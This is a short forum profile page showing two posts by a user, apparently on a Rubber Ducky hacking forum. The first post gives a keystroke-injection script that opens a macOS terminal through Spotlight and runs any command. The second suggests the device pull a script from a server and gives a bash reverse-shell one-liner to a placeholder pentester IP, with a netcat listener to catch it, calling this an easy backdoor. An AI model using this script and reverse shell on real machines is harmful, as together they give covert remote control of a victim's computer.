Jump to content

sub0

Active Members
  • Posts

    8
  • Joined

  • Last visited

Posts posted by sub0

  1. I use this script to open spotlight and enter a terminal.

    DELAY 1500
    GUI SPACE
    DELAY 100
    STRING terminal
    DELAY 50
    ENTER
    DELAY 1000
    STRING # Whatever command you want to execute
    DELAY 50
    ENTER
    DELAY 50
    STRING exit
    DELAY 50
    ENTER
    DELAY 20
    GUI q
    

     

  2. If you really want to use Python, have the Ducky grab the script from a server (Or hastebin). However, there are much easier ways to accomplish a backdoor. You can just execute this command: `bash -i >& /dev/tcp/pentesterIPaddr/5000 0>&1` on UNIX systems and catch the shell with Netcat. (nc -l -p 5000)

×
×
  • Create New...